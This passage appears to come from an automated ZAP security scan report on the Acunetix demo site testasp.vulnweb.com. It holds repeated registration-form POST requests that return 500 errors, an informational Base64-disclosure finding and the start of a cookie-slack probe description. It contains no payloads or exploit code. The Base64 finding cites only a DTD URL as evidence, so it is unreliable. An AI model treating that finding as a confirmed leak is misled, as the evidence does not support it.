Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 505 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| Instances | 51 |
| Solution |
Manually confirm that the Base64 data does not leak sensitive information, and that the data cannot be aggregated/used to exploit other vulnerabilities.
|
| Reference | http://projects.webappsec.org/w/page/13246936/Information%20Leakage |
| Tags |
OWASP_2021_A04
OWASP_2017_A03 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 10094 |
|
Informational |
Cookie Slack Detector |
|---|---|
| Description |
Repeated GET requests: drop a different cookie each time, followed by normal request with all cookies to stabilize session, compare responses against original baseline GET. This can reveal areas where cookie based authentication/attributes are not actually enforced.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 279 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:27 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
